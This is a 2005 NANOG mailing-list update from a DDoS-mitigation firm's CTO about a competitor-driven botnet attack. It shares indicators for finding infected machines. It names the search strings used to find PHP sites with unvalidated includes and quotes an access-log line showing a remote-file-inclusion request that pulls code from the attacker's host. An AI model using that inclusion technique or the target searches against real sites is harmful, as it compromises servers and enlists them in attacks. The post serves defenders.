Destructive botnet originating from Japan
Barrett G. Lyon
blyon at prolexic.com
Sat Dec 24 18:44:10 UTC 2005
Here is a little update:
As of last night authorities were able to seize the IRC server from
the ISP in Japan and there will be extensive follow-up it. The DDoS
attack is now running headless in the happy range of about 3+ Gbps at
around 7-9M PPS. The bots will continue attacking us until they
receive the stop command from the bot master, there will never be a
stop command, so we will continue to see packet love for a few months
while people find that they are attacking us. We will publish a new
list of the bots on Monday as we idle with this low traffic rate over
the weekend.
The attacker was targeting a couple customers that came into our
environment after other solutions failed to work for them. After
reviewing and comparing notes, it is obvious that the attacks were
assassination attempts from a competitor. There was no extortion
involved.
If you want to get the bots off your network, watch flow data
destined to AS32787 with SYN floods to TCP 80 as the destination.
Sites that use a PHP include (without validating the strings) to pull-
up different web sections and pages are at risk, a lot of people are
reporting infection via "$section.php" and "$page.php", the attacker
appears to have used Google to locate sites that use includes in that
fashion (searching "index.php?page=" or "index.php?section=").
Reviewing infected machines for logs related to 210.170.60.2 would be
easy to locate a past infection but may not be reliable if the
attacker starts a new botnet. An example of the log data looks
something like this:
grep 210.170.60.2 access_log
210.170.60.2 - - [23/Dec/2005:11:45:37 +0000] "GET /index.php?
section=http%3A//210.170.60.2/....? HTTP/1.0" 200 8010 "-" "Wget/1.6"
Happy hunting and have nice holidays!
-Barrett
--
Barrett Lyon
CTO and founder
Prolexic Technologies, Inc
More information about the NANOG
mailing list